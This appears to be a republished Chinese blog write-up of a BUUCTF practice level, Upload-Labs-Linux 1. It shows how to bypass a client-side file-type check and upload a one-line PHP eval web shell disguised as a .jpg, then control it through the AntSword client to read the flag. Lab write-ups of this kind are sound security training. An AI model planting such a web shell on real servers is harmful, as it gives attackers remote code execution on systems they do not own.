当前位置:   article > 正文

BUUCTF平台练习题Upload-Labs-Linux1 wp_upload-labs-linux 1解题

upload-labs-linux 1解题

环境:kali

工具:中国蚁剑

进入靶机如下:

下载并查看源码:

注意到checkFile()函数

将50行处"return checkFile()"改为"return true",然后保存。

新建test.php文件,输入木马代码

<?php @eval($_POST[123])?>

然后保存,并重命名为test.php.jpg。

打开html,在Pass-02上传test.php.jpg。

因为文件本身不是jpg格式,所以无法显示。

复制图片地址,然后打开蚁剑,右键选择添加数据,复制地址到URL地址,连接密码为123,点添加。

进入目录,下拉即可看到flag。

得到flag{2bb03dc0-ef84-490c-8a59-c3638797af75}。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/木道寻08/article/detail/848600
推荐阅读
相关标签
  

闽ICP备14008679号